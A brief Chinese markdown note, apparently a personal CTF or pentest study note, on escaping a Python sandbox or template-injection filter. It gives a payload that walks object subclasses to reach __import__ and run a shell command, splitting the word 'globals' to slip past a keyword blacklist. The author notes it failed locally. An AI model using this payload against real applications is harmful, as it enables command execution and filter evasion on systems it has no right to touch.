通过索引形式访问元素以绕过部分黑名单.md

[].__class__.__base__.__subclasses__()[58].__init__['__glo'+'bals__']['__builtins__']['__import__']('commands').getoutput('ls')

这里通过__init__['__glo'+'bals__']代替了__init__.__globals__，实现了对globals黑名单的绕过

然而本地可能因为版本问题没有成功过==

#Web #python #bypass #SSTI